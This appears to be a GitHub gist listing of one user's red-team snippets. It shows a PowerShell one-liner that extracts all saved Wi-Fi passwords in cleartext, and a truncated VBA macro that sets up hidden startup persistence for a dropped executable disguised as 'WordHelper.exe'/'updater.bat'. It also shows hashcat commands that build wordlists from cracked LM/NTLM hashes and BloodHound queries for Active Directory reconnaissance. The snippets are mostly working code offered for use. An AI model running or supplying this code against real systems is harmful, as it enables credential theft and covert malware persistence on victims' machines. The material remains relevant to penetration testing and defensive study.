Javier Antunez javierantunez

@javierantunez
javierantunez / wifipass
Created September 2, 2022 16:28
wifipass (English or Spanish)
if ((Get-WinSystemLocale).NAME.split("-")[0] -eq "es") { $keyString ="Contenido de la clave\W+\:(.+)$"} else {if ((Get-WinSystemLocale).NAME.split("-")[0] -eq "en") { $keyString ="Key Content\W+\:(.+)$"}};(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String $keystring | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_}| %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}| Format-Table -AutoSize
javierantunez / VBA Persistence autorun
Created May 6, 2022 04:10
Simple VBA current user autorun persistence using bat and powershell to execute dropped file
Sub persist()
'Autorun persistence
userprofile = CStr(Environ("USERPROFILE"))
'File must exist (ie using VBA DROPPER)
archivoDescarga = userprofile & "\AppData\Local\Microsoft\Office\WordHelper.exe"
strFileContent = "powershell -Sta -Nop -Window Hidden" & " " & archivoDescarga
strPersistPath = userprofile + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
strPersistFilePath = "\updater.bat"
javierantunez / gist:070b7e4957c6cb9908bb90c28eb8481e
Last active April 16, 2022 02:44
Custom-dictionary-from-cracked-hashes
# During cracking sessions, the creation and use of custom dictionaries has been useful. To automate the dictionary enrichment a little, I used PowerShell.
######################################################################################################
# Option 1 (more ps command line focused)
# LM cracked
(.\hashcat.exe -m 3000 hashes.txt --username --potfile-path hashcat.potfile --show) | foreach {$_.split(':')[2]} | out-file temp.dic -Encoding ascii
# NTLM cracked
(.\hashcat.exe -m 1000 hashes.txt --username --potfile-path hashcat.potfile --show) | foreach {$_.split(':')[2]} | out-file temp.dic -Encoding ascii -append
javierantunez / red-teaming-bloodhound-cypher-queries.md
Created November 16, 2021 03:50 — forked from mgeeky/red-teaming-bloodhound-cypher-queries.md
A handy list of Cypher queries that I've used during AD assessments
  • Returns computer names and their operating system for statistics purposes:
MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS
  • Returns a summary report of machines grouped by operating system version, along with the number of machines running each OS version:
MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC